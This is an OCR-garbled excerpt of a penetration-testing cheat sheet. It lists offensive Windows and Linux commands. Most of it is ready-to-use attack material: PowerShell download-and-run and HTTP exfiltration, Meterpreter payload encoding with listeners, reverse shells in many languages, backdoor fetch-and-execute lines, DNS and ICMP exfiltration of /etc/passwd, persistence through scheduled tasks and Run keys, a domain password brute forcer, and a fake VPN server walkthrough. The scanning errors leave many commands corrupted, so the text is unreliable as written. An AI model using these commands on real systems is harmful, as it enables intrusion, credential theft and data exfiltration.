8-11 , 2 013 AND THE HOURS OF

powershell. exe -Command "do {if ((Get-Date -format yyyyl1l1dd-HHmm) -match
'201308 ( 0 [ 8-9] 11 [0-1])- I 0 [ 8-9] 11 [ o-c]) [ 0-5] [ 0-9]') {Start-Process WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"

POWERSHELL RUNAS
$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential argument list "DOl1AIN\user
$pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'
11 ,

EMAIL SENDER
powershell.exe Send-l-1ai1Hessage -to " email " -from " email " -subject
"Subject -a " attachment file path " -body "Body" -SmtpServer Target
Email Server IP
11

TURN

ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)

net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRl-1'"
Enter-PSSession -ComputerName ip -Credential username

LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
l1icrosoftDNS _ ResourceRecord -Filter "domainname~' DOl1AIN '" I select
textrepresentation

POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION
powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true); $source~"""https:ll YOUR SPECIFIED IP I file.zip """;
$destination= 111111 C:\rnaster.zip 111111 ;-$http = new-object Systern.Net.WebClient;
$response~ $http.DownloadFile($source, $destination);"

POWERSHELL DATA EXFIL
Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command

"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true); $server~"""http:ll YOUR SPECIFIED IP I folder """;
$filepath=" 1111 C:\rnaster.zip 111111 i
$response~

$http= new=object System.Net.WebClient;

$http.UploadFile($server,$filepath);"
23

USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY
~
~
~

Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page

ON ATTACK BOXES
1.
2.
3.
4.
5.

./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86
LHOST=l.l.l.l LPORT=443
audit.psl
Move audit.psl into same folder as encodeMeterpreter.psl
Launch Powershell (x86)
powershell.exe -executionpolicy bypass encodeMeterpreter.psl
Copy the encoded Meterpreter string

START LISTENER ON ATTACK BOX
1.
2.
3.
4.
5.
6.

./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse https
set LHOST 1. 1. 1. 1
set LPORT 443
exploit -j

ON TARGET (MUST USE POWERSHELL (x86))
1.

powershell. exe -noexi t -encodedCommand
string here

paste encoded

t~eterpreter

PROFIT

ENCODEMETERPRETER. PSl [7]
# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()

# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer

24

USING POWERSHELL TO LAUNCH METERPRETER

(2ND METHOD)

ON BT ATTACK BOX
1.

rnsfpajload windows/rneterpreter/reverse tcp
LPORT~8080 R I rnsfencode -t psh -a x86

LHOST~10.1.1.1

ON WINDOWS ATTACK BOX
1.
2.

3.
4.

5.
6.

c:\ powershell
PS c:\ $crnd ~ ' PASTE THE CONTENTS OF THE PSH SCRIPT HERE
PS c:\ $u ~ [Sjstern.Text.Encoding]: :Unicode.GetBytes($crnd)
$e ~ [Convert] ::ToBase64String($u)
PS c: \
PS c:\
$e
Copf contents of $e

'

START LISTENER ON ATTACK BOX
1.

2.
3.
4.
5.
6.

./rnsfconsole
use exploit/multi/handler
set pajload windows/rneterpreter/reverse tcp
set LHOST 1.1.1.1
set LPORT 8080
exploit -j

ON TARGET SHELL ( 1 : DOWNLOAD SHELLCODE, 2 : EXECUTE)
1.

c: \

powershell -noprofile -noninteracti ve -command " &

{$client~new-object

2.

Sjstern.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt
', 'c:\windows\ternp\ shell.txt') )"
c: \
powershell -noprofile -noninteracti ve -noexi t -command 11 &
{$crnd~tjpe 'c:\windows\ternp\ shell.txt';powershell -noprofilenoninteractive -noexit -encodedCornmand $cmd} 11

PROFIT

25

WINDOWS REGISTRY
OS INFORMATION
HKLM\Software\Microsoft\Windows NT\CurrentVersion

PRODUCT NAME
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne

DATE OF INSTALL
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

REGISTERED OWNER
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

SYSTEM ROOT
HKLM\Software\~icrosoft\Windows

TIME ZONE

NT\CurrentVersion /v SjstemRoot

(OFFSET IN MINUTES FROM UTC)

HKLM\Sjstem\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias

MAPPED NETWORK DRIVES
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU

MoUNTED DEVICES
HKLM\Sjstern\MountedDevices

USB DEVICES
HKLM\Sjstern\CurrentControlSet\Enurn\USBStor

TURN ON IP FORWARDING
HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcp~p\Parameters

IPEnableRouter

=

PASSWORD KEYS :

-

1

LSA SECRETS CAN CONTAIN VPN 1 AUTOLOGON 1 OTHER

PASSWORDS
HKEY LOCAL MACHINE\Securitj\Policy\Secrets
HKCU\Soft\v~re \t1icroso ft \Windows NT\CurrentVersion \Winlogon \autoadminlogon

AUDIT POLICY
HKLM\Security\Policj\?olAdTev
26

KERNEL/USER SERVICES
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

INSTALLED SOFTWARE ON MACHINE
HKLt1\Software

INSTALLED SOFTWARE FOR USER
HKCU\Software

RECENT DOCUMENTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

RECENT USER LOCATIONS
HKCU\Software\Microsoft\Windows\Curren~Version\Explorer\ComDlg32\LastVisite

dtmu & \Opensavetmu

TYPED URLs
HKCU\Software\Microsoft\Internet Explorer\TjpedURLs

MRU LISTS
HKCU\ Software \:ci erose ft \Windows\ Cur rentVer s ion\ Explorer \Runt1RU

LAST REGISTRY KEY ACCESSED
HKCU\Software\l1icrosoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeJ

STARTUP LOCATIONS
HKLl1\Soft'..;are \t1icroso:t \ 1/'Jindows \CurrentVers on \Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVers on\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVers on\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run

2-

ENUMERATING WINDOWS DOMAIN WITH DSQUERY
LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS
dsquery user -limit 0

LIST GROUPS FOR DOMAIN=VICTIM.COM
dsquery group ''cn=users, dc=victim, dc=com''

LIST DOMAIN ADMIN ACCOUNTS
dsquerj group -name "domain admins 11

i.

dsget group -members -expand

LIST ALL GROUPS FOR A USER
dsquery user -name bob 1

I dsget user -memberof -expand

GET A USER'S LOGIN ID
dsquerj user -name

bob~

i

dsget user -samid

LIST ACCOUNTS INACTIVE FOR

2 WEEKS

dsquery user -inactive 2

ADD DOMAIN USER
dsadd user ''CN=Bob,CN=Users,DC=victim,DC=corn'' -samid bob -pwd bobpass11
-pwdneverexpires jes -rnemberof "CI';=Domain
Admins,CN=Users,DC=victim,DC=com

displaj "Bob

DELETE USER
dsrm -subtree -noprornpt ''CN=Bob,CN=Users,DC=victim,DC=com''

LIST ALL OPERATING SYSTEMS ON DOMAIN
dsquerJ A ''DC=victim,DC=com'' -scope subtree -attr ''en'' ''operati~gSjstern''
''operatingSjstemServicePack'' -filter
11 (& (objectclass=computer) (objectcategorJ=computer) (operatingSjstem=Windows}

I I"

LIST ALL SITE NAMES
dsquerJ site -o rdn

-l~mit

LIST ALL SUBNETS WITHIN A SITE
dsquery subnet -site

sitename

-o rdn

LIST ALL SERVERS WITHIN A SITE
dsquerJ server -site

sitename

-o rdn
28

FXND SERVERS XN THE DOMAIN
dsquery ' domainroot -filter
" (& (objectCategory~Computer) (objectClass~Computer) (operatingSystem~'Server'

) ) " -limit 0

DOMAIN CONTROLLERS PER SXTE
dsquery

J

''CN=Sites,CN=Configuration,DC=forestRootDomain'' -filter

(objectCategory~Server)

29

WINDOWS SCRIPTING
) If scripting in batch file,

variables must be preceeded with %%,

i.e. %%i

NESTED FOR LOOP PING SWEEP
for /L %i in (10,1,254) do@ (for /L %x in (10,1,254)
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x

do@ ping -n 1 -w 100
live.txt)

LOOP THROUGH FILE
for /F %i in

I file I do

command

DOMAIN BRUTE FORCER
for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$
NUL

ACCOUNT LOCKOUT

(LOCKOUT. BAT)

@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in
1234\c$ /USER:%%U wrongpass

(1,1,5)

do @echo net use \\WIN-

DHCP EXHAUSTION
for /L %i in (2,1,254) do (netsh interface ip set address local static
netrnask
gw
I~
%1 ping 12- .0.0.1 -n l -w 10000
nul %1)
1.1.1.%i

DNS REVERSE LOOKUP
for /L %i in (100, 1, 105)
dns.txt && echo Server:

SEARCH FOR FILES BEGINNING WITH THE WORD
IT

1

I findstr /i /c:''Name''

do @ nslookup l.l.l.%i
1.1.1.%i
dns.txt

11

PASS 11 AND THEN PRINT IF

S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND

SIZE

(@VARIABLES ARE OPTIONAL)

forfi1es /P c:\ternp /s /rn pass' -c "crnd /c echo @isdir @fdate @ftirne
@relpath @path @fsize"

SIMULATE MALICIOUS DOMAIN CALLOUTS

(USEFUL FOR AV/IDS TESTING)

Run packet capture on attack domain to receive callout
domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain
NUL 2 &1 & ping -n 5 12-.0.0.1
NUL 2 &1

IE

WEB LOOPER

(TRAFFIC GENERATOR)

for /L %C in (1,1,5000) do @for %U in (www.Jahoo.com www.pastebin.com
www.pajpal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe

38

tlai/)'

rnrt

Y"

-7

-

_,

GET PERMISSIONS ON SERVICE EXECUTABLES
for /f ''tokens=2 delims='=''' %a in ('wmic service list full
''pathname'' I find /i /v ''s~stem32''') do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = ''
/c icacls ''%a''

delims = '' %a in

ROLLING REBOOT

lfind /i

(c:\windows\temp\3afd4ga.tmp)

do cmd.exe

(REPLACE /R WITH /S FOR A SHUTDOWN) :

for /L %i in (2,1,254)
message''

do shutdown /r /m \\l.l.l.%i /f /t 0 /c "Reboot

SHELL ESCALATION USING VBS

(NEED ELEVATED CREDENTIALS)

# Create .vbs script with the following
Set shell ' wscript.createobject(''wscript.shell'')
Shell.run ''runas /user: user
'' & '''''''' &
C:\Windows\SJstem32\WindowsPowershell\vl.O\powershell.exe -WindowStJle
hidden -NoLogo -~onlnteractive -ep bjpass -nop -c \'' & '''''''' & ''IEX ((NewObject Net.WEbClieil':).down:oadstring(' url '))\" & """" & """"
wscript.sleep (100)
shell.Sendkejs '' password '' & ''{ENTER}''

31

TASK

SCHEDULER

' Scheduled tasks binary paths CANNOT contain spaces because everjthing
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x argl"

TASK SCHEDULER (ST=START TIME,

SD=START DATE, ED=END DATE)

*MUST BE ADMIN
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED l1M/DD/YYYY /tr "C:\mj.exe" /RU DOl1AIN\ user /RP
password

TASK SCHEDULER PERSISTENCE [10]
'For 64 bit use:
"C:\Windows\sjswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring( ''http:// ip : port I payload'''))'" /SC
onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStjle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring(''http:// ip : port I payload'''))'" /SC
onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c 'IEX ((new-object
net.webclient) .downloadstring(''http:// ip : port I payload'''))'" /SC
onidle /i 30

32

COMMON PORTS
21
22
23
25
49
53
6-;s
69
80
88
110
111
123
135

13138
139
143
161
1-9
201
389
443
445
500
514

520
546r
58902
1080
1194
1433/4
1521
1629
204 9
3128
3306
3389
5060
5222
5432
5666
5900
6000
6129
6669001
9001
9090/1
9100

FTP
SSH
Tel net
St1TP
TACACS
DNS
DHCP (UDP)
TFTP (UDP)
HTTP
Kerberos
POP3
RPC
NTP (UDP)
Windows RPC
NetBIOS
NetBIOS
Sl1B
Il1AP
SNHP (UDP)
BGP
AppleTalk
LDAP
HTTPS
SHE
ISAKt1P (UDP)
Sjslog

RIP
DHCPv6
St1TP
Vt1Ware
Socks Proxy
VPN
t1S-SQL
Oracle
DarneWare
NFS
Squid Proxy
t1ySQL
RDP
SIP
Jabber
Postgres
Nagios
VNC
X11
DameWare
IRC
Tor
HSQL
Open fire
Jet Direct

TTL FINGERPRINTING
Windows : 128
Linux
: 64
Network : 255
Solar is : 255

35

IPv4
CLASSFUL
A
B

c
D
E

IP

RANGES

0.0.0.0
128.0.0.0 192.0.0.0 224.0.0.0240.0.0.0 -

12".255.255.255
191.255.255.255
223.255.255.255
239.255.255.255
255.255.255.255

RESERVED RANGES
10.0.0.0
12?.0.0.0
172.16.0.0
192.168.0.0

-

10.255.255.255
12'.255.255.255
1-2.31.255.255
192.168.255.255

SUBNETTING
/31
/30
/29
/28
/2"
/26
/25
/24
/23
/22
/21
/20
/19
/18
/17
/16
/15
/14
/13
/12
/11
/10
/9
/8

255.255.255.254
255.255.255.252
255.255.255.248
255.255.255.240
255.255.255.224
255.255.255.192
255.255.255.128
255.255.255.0
255.255.254.0
255.255.252.0
255.255.248.0
255.255.240.0
255.255.224.0
255.255.192.0
255.255.128.0
255.255.0.0
255.254.0.0
255.252.0.0
255.248.0.0
255.240.0.0
255.224.0.0
255.192.0.0
255.128.0.0
255.0.0.0

1 Host
2 Hosts
6 Hosts
14 Hosts
30 Hosts
62 Hosts
126 Hosts
254 Hosts
510 Hosts
1022 Hosts
2046 Hosts
4094 Hosts
8190 Hosts
16382 Hosts
32?66 Hosts
65534 Hosts
1310"0 Hosts
262142 Hosts
524286 Hosts
1048574 Hosts
209-150 Hosts
4194302 Hosts
8388606 Hosts
16"'"214 Hosts

CALCULATING SUBNET RANGE
Given: 1.1.1.101/28
~
/28 = 255.255.255.240 netmask
~
256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32 ...
~
Range where given IP falls: 1.1.1.96 - 1.1.1.111

36

IPv6
BROADCAST ADDRESSES
ff02::1ff05::1ff01::2ff02::2ff05::2-

link-local
site-local
node-local
link-local
site-local

nodes
nodes
routers
routers
routers

INTERFACE ADDRESSES
fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6

THC IPv6 TOOLKIT
Remote Network DoS:
rsumrf6 eth# remote ipv6

SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS
socat TCP-LISTEN:8080,reuseaddr,fork TCP6: [2001: :] :80
./nikto.pl -host 12-.0.0.1 -port 8080

r

CISCO COMMANDS

Configure interface
Configure FastEthernet 0/0
Add IP to fa0/0
Configure vtj line
1. Set telnet password
2. Set telnet password
Open sessions
IOS version
Available files
File information
Deleted files
Config loaded in mem
Config loaded at boot
Interfaces
Detailed interface info
Rot:tes
Access lists
No limit on output
Replace run w/ start config
CopJ run config to TFTP Svr

#configure terminal
(config)#interface fa0/0
(config-if)#ip addr 1.1.1.1 255.255.255.0
(config)#line VtJ 0 4
(config-line)#login
(config-line)#password password
#show session
#show version
#dir file SJStems
#dir all-filesjstems
#dir /all
#show running-config
#show startup-config
#show ip interface brief
#show interface eO
#show ip route
#show access-lists
#terminal length 0
#copj running-config startup-config
#cop] running-config tftp

CISCO

IOS 11.2-12.2

VULNERABILITY

http:// ip /level/ 16-99 /exec/show/config

SNMP
MUST START TFTP SERVER
./snmpblow.pl -s
snmpstrings.txt

srcip

1ST

-d

rtr ip

-t

attackerip

-f out.txt

WINDOWS RUNNING SERVICES:
snrnpwalk -c public -v1

ip

1 lgrep hrSWRJnName !cut -d" " -f4

WINDOWS OPEN TCP PORTS :
smpwalk

lgrep tcpConnState !cut -d" " -f6 !sort -u

WINDOWS INSTALLED SOFTWARE:
smpwalk

!grep hrSWinstalledName

WINDOWS USERS:
snmpwalk

ip

1.3

lgrep --.1.2.25

-f4

38

PACKET CAPTURING
CAPTURE

TCP

TRAFFIC ON PORT 22-23

tcpdurnp -nvvX -sO -i ethO tcp portrange 22-23

CAPTURE TRAFFIC TO SPECIFIC
tcpdurnp -I ethO -tttt dst

IP

ip

EXCLUDING SPECIFIC SUBNET

and not net 1.1.1.0/24

CAPTURE TRAFFIC B/W LOCAL-192 .1
tcpdurnp net 192.1.1

CAPTURE TRAFFIC FOR  SECONDS
durnpcap -I ethO -a duration: sec

-w file

file.pcap

REPLAY PCAP
file2cable -i ethO -f file.pcap

REPLAY PACKETS

(rozz

1 DoS)

tcpreplaj --topspeed --loop=O --intf=ethO
rnbps=l0110011000

.pcap_file_to replaj

DNS

'•

DNSRECON
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d dornain.corn

Enumerate subdornains:
./dnsrecon.rb -t brt -d dornain.corn -w hosts.txt
DNS zone transfer:
./dnsrecon -d dornain.corn -t axfr

NMAP REvERSE DNS LOOKUP AND OUTPUT PARSER
nrnap -R -sL -Pn -dns-servers dns svr ip
range
I awk '{if( ($1" "$2"
"$3)=="Nrnap scan report")print$5" "$6}' I sed 's/(//g' I sed 's/)//g'
dns.txt

39

VPN
WRITE PSK TO FILE
ike-scan -M -A

vpn ip

-P file

DoS VPN SERVER
ike-scan -A -t 1 --sourceip= spoof ip

dst ip

FIKED - FAKE VPN SERVER
~

Must know the VPN group name

a~d

1.

Ettercap filter to drop IPSEC traffic IUDP port 5001
iflip.proto == UDP && udp.scc == 5001 I
kill I I;
drop I I;

pre-shared ke;

msg ("-' ' ' ' 'UDP packet dropped 1 > ' ' -1 " )

2.
3.
4.
5.

6.

8.

;

Compile filter
etterfilter udpdrop.filter -o udpdrop.ef
Start Ettercap and drop all IPSEC ~raffic
#ettercap -T -g -M arp -F udpdrop.ef II II
Enable IP Forward
echo "1"
lprocls;slnetlipv4lip_forward
Configure IPtables to port forward to Fiked server
iptables -t nat -A PREROUTING -p udp -I ethO -d VPN Server IP
-j
DNAT - - to Attacking Host IP
ipcables -P FORWARD ACCEP~
Start Fiked to impersonate the VPN Server
fiked - g vpn gatewa; ip - k VPN Group Name:Group Pre-Shared Ke;
Stop Ettercap
Restart Ettercap without the filter
ettercap -T -M arp II II

PUTTY
REG KEY TO HAVE PuTTY LOG EVERYTHING (INCLUDING CONVERSATIONS)
[HKEY_CURRENT_USER\Software\Si~onTatham\Putt;\Sessions\Default%20Settings]

"LogFileName"="%TEMP%\putt;.dat"
"LogT;pe"=dword:00000002"

40

FILE TRANSFER

FTP

THROUGH NON-INTERACTIVE SHELL

echo open ip 21
ftp.txt
echo user
ftp.txt
echo pass
ftp.txt
echo bin
ftp.txt
echo GET
file
=tp.txt
echo bfe
ftp.txt
ftp -s:ftp.txt

DNS TRANSFER ON LINUX
On victim:
1.
Hex e~code the file to be transferred
xxd -p secret
fi:e.hex
2.
Read in each line and do a D~S lookup
forb in 'cat fole.hex '; do dig $b.shell.evilexample.com; done
On attacker:
1.
Capture DNS exfil packets
tcdpump -w /tmp/dns -sO port 53 and host sjstem.example.com
2.
Cut the exfil!ed hex from t~e DNS packet
tcpdump -r dnsdemo -n I grep shell.evilexample.com I cut -f9 -d'
cut -fl -d'.' I uniq
received. txt
3.
Reverse the hex encoding
xxd -r -p
received~.txt
kefS.pgp

EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER

ICMP

On victim (never endi~g l liner) :
stringz-·cat /etc/passwd I od -tx1 I cut -c8- I tr -d " " I tr -d "\n"'
counter-0; while (($counter - ${#stringZ})} ;do ping -s 16 -c l -p
${stringZ:$counter:16} 192.168.10.10 &&
counter=$( (counter+~6)) ;done
On attacker (capture pac~ets to data.dmp and parse}:
tcpdump -ntvvSxs 0 'icmp[C:-a•
data.dmp
grep Ox0020 data.dmp I cut -c21- I tr -d " " I tr -d "\n"

OPEN MAIL RELAY
C:\ telnet x.x.x.x 25
HELO x.x.x.
l1AIL FROl1: me@jou.com
RCPT TO: fOU@;ou.com
DATA
Thank You.
quit

43

I xxd -r -p

REVERSE SHELLS [11 [31 [41
NETCAT

(*

START LISTENER ON ATTACK BOX TO CATCH SHELL)
Linux reverse shell
Windows reverse shell

nc 10.0.0.1 1234 -e /bin/sh
nc 10.0.0.1 1234 -e cmd.exe

NETCAT (SOME VERSIONS DON'T SUPPORT -E OPTION)
nc -e /bin/sh 10.0.0.1 1234

NETCAT WORK-AROUND WHEN -E OPTION NOT POSSIBLE
rm /tmp/f;mkfifo /tmp/f;cat /tmp/fl/bin/sh -i 2 &line l0.0.0.1 1234

/tmp/f

PERL
perl -e 'use Socket; $i~"10.0.0.l"; $p~1234; socket(S,PF INET, SOCK STREAt1,
getprotobjname("tcp") I; if(connect(S,sockaddr in($p,inet-aton($i) I iT!
open(STDIN," &S") ;open(STDOUT," &S"); open(ST~ERR," &8"17 exec("/bin/shi" I; l ; '

PERL WITHOUT /BIN/SH
perl -t1IO -e '$p~fork;exit,if($p);$c~new
IO: :Socket: :INET(PeerAddr,"attackerip:4444") ;STDIN- fdopen($c,r) ;$-fdopen($c,w) ;sjsteffi$ while
·'

PERL FOR WINDOWS
perl -MIO -e '$c=new IO: :Socket: :INET(PeerAddr,''attackerip:4444'') ;STDINfdopen($c,r) ;$-- fdopen($c,w) ;system$ while
·'

PYTHON
python -c 'import socket, subprocess, os; s=socket. socket (socket ..;;F_ INET,
socket.SOCK_STREAL1); s.connect( ("10.0.0.1",1234)); os.dup2 (s.fileno() ,0);
os.dup2(s.fileno(l,1); os.dup2(s.file:oo(),2);
p~subprocess.call( 1"/bin/sh","-i"] I;'

BASH
bash -i

& /dev/tcp/10.0.0.1/8080 0 &1

JAVA
r ~ Runtime.getRuntime()
p ~ r.exec( 1"/bin/bash","-c","exec 5 /dev/tcp/10.0.0.1/2CJ2;cat
while read line; do \$:ine 2 &5 &5; done"] as String[])
p.waitFor()

&5

1

PHP
php -r

'$sod:~fsockopen("10.0.0.1",

1234) ;exec("/bin/sh -i

44

&3

&3 2 &3");'

RUBY
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234) .to i; exec
sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

RUBY WITHOUT /BIN/ SB
by -rsocket -e 'exit if
fork;c=TCPSocket.new("attackerip","4444");while(crnd=c.gets);IO.popen(cmd,

11

r

"I { liolc.print io.read}end'

RUBY FOR WINDOWS
ruby -rsocket -e
'c=TCPSocket.new("attacY..erip","4444");while(crnd=c.gets);IO.popen{cmd,"r
iolc.print io.read}end'

11 )

TELNET
rm -f /tmp/p; mknod /tmp/p p && telnet attacl:erip 4444 0/tmp/p
--OR-telnet attacl:erip 4444 I /bin/bash I telnet attackerip 4445

XTERM
xterm -displaj 10.0.0.1:1
o Start Listener: Xnest :1
o Add permission to connect: xhost +victimiP

Mise
wget hhtp:// server /backdoor.sh -0- I sh

45

Downloads and runs backdoor.sh

{I

PERSISTENCE
FOR LINUX PERSISTENCE

(ON ATTACK BOX)

crontab -e : set for every 10 min
0-59/10 ' ' ' ' nc ip 7"" -e /bin/bash

WINDOWS TASK SCHEDULER PERSISTENCE

(START TASK SCHEDULER)

sc config schedule start~ auto
net start schedule
at 13:30 ''''C:\nc.exe ip 7~7 -e cmd.exe''''

WINDOWS PERSISTENT BACKDOOR WITH FIREWALL BYPASS
1.
2.
3.

REG add HKEY CURRENT USER\Software\l1icrosoft\Windows\CurrentVersion\Run
/v firewall 7t REG SZ /d "c:\windows\system32\backdoor.exe" /f
at 19:00 /every:t1,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
SCHTASKS /Create /RU "SYSTEt1" /SC l1INUTE /t10 45 /TN FIREWALL /TR
"%USERPROFILE%\backdoor.exe" /ED 12/12/2012

REMoTE PAYLOAD DEPLO"!MENT VIA
Via
1.
2.
3.

SMB

OR WEBDAV [

6]

SMB:
From the compromised machine, share the payload folder
Set sharing to 'Everyone'
Use psexec or wmic command to remotely execute payload

Via WebDAV:
1.
Launch Metasploit 'webdav file server' module
2.
Set following options:
localexe~true
localfile~

localroot~

payload
payload directory

disablePayloadHandler~true

3.

Use psexec or wmic command to remotely execute payload

psexec \\ remote ip
ip \test\msf.exe"

/u domain\compromised_user /p password "\\payload

OR wmic /node: remote ip /user:domain\compromised user //password:password
process call create "\ \ payload ip \test\msf.exe"

46

TUNNELING
FPIPE -

LISTEN ON

fpipe.exe

l

1234

AND FORWARD TO PORT

80

ON

2. 2. 2. 2

1234 -r 80 2.2.2.2

SOCKS.EXE- SCAN INTRANET THROUGH SOCKS PROXY
On redirector (1.1.1.1):
socks.exe -i1.1.1.1 -p 8C80
On attacker:
Modifj /etc/proxjchains.conf:
Comment out:
Comment out:
9050
Add line:
socks4
1.1.1.1
8080
Scan through socks prox1:
proxjchains nmap -PN -vv -sT -p 22,135,139,445 2.2.2.2

SOCAT soca~

LISTEN ON

1234

AND FORWARD TO PORT

ON

2. 2. 2. 2

TCP4:LISTEN:1234 TCP4:2.2.2.2:80

STUNNEL -

SSL ENCAPSULATED

NC

TUNNEL

0!1 attacker (client):
Modifj /stunnel.conf
clien:. = jes
[netcat client]
accept ~ 5555
connect ~ -~istening IP-:4444
On victim (listening server)

l1odifJ /s:.unnel.conf
client

no
server]
accept ~ 4444
connect =
nc -vlp ---=

[ne~cat

C:\

80

On attacker (clien~):
# nc -nv 12-.0.C.1 5555

q-

(WINDOWS & LINUX)

[

8]

GoOGLE HACKING
one
search within a number range
search within past [#] months
find pages that link to [url]
find pages related to [url]
find pages with [string] in title
find pages with [string] in url
find files that are xls
find phone book listings of [name]

numrange: [#]-[#]
date: [ #]
link: [url]
related: [url]
intitle: [string]
inurl: [string]
filetjpe: [xls]
phonebook: [name]

VIDEO TELECONFERENCING
POLYCOM

telnet ip
#Enter 1 char, get uname:pwd
http:// ip /getsecure.cgi
http:// ip /era rcl.htm
http:// ip /a securitj.htm
http:// ip /a-rc.htm

TANDBERG
http:// ip /snapctrl.ssi
SONY WEBCAM

http:// ip /commard/visca-gen.cgi?visca~ str
8101046202FF : Freeze Camera

~8

NMAP
SCAN TYPES
-sP
-ss
-sT

ping scan
syn scan
connect scan

-su

udp scan

-so

protocol scan

OPTIONS
-pl-65535
-T[0-5]

ports

-n

no dns resolution

-PN : no ping
-6
: IPv6 scan

-0
-A

OS detection

--randomize-hosts

OUTPUT

o~5m,

-sv : version detection
1~15s,

2~.4s

aggressive scan

I INPUT

-ox file
-oG file
-oA file
-iL file
-exclude file

file

write to xml file
write to grep file
save as all 3 formats
read hosts from file
excludes hosts in file

AD~CED OPTIONS

-sV -p# --script~banner
-trace route

-ttl : set TTL
--script script.

FIREWALL EVASION
-f

-s

ip
-g #
-D ip , ip
--mtu #

CONVERT

--spoof-mac mac
--data-length size
(append random data)
--scan-delay 5s

fragment packets
spoof src
spoof src port
Decoy
set l1TU size

NMAP XML

FILE TO

HTML:

